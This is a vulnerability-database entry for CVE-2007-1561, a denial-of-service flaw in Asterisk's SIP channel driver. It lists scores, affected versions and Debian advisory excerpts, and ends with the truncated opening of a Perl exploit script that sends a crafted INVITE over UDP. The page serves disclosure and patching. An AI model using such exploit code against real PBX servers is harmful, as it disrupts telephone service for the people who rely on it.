CVE-2007-1561

Published: 21/03/2007 Updated: 16/10/2018
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

The channel driver in Asterisk prior to 1.2.17 and 1.4.x prior to 1.4.2 allows remote malicious users to cause a denial of service (crash) via a SIP INVITE message with an SDP containing one valid and one invalid IP address.

Vulnerable Product

asterisk asterisk 1.2.15

asterisk asterisk 1.2.16

asterisk asterisk 1.4.1

asterisk asterisk 1.2.14

Vendor Advisories

Debian Bug report logs - #419820 CVE-2007-1594: Asterisk segfaults upon receipt of a certain SIP packet (SIP Response code 0) Package: asterisk; Maintainer for asterisk is Debian VoIP Team <pkg-voip-maintainers@lists.alioth.debian.org>; Source for asterisk is src:asterisk (PTS, buildd, popcon) Reported by: Frédéric Brière ...
Debian Bug report logs - #415466 asterisk: SIP INVITE DoS, supposedly fixed in 1.4.2 and 1.2.17, which is released today 19/03/2007 Package: asterisk; Maintainer for asterisk is Debian VoIP Team <pkg-voip-maintainers@lists.alioth.debian.org>; Source for asterisk is src:asterisk (PTS, buildd, popcon) Reported by: Jeroen Massa ...
Several remote vulnerabilities have been discovered in Asterisk, a free software PBX and telephony toolkit. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-1306: Mu Security discovered that a NULL pointer dereference in the SIP implementation could lead to denial of service. CVE-2007-1561: Inr ...

Exploits

#!/usr/bin/perl
# perl asterisk-Invitepl 1921681104 5060 userX 19216812 5060 userY
use IO::Socket::INET;
die "Usage $0 <dst> <dport> <dusername> <src> <sport> <susername>" unless ($ARGV[5]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=> ...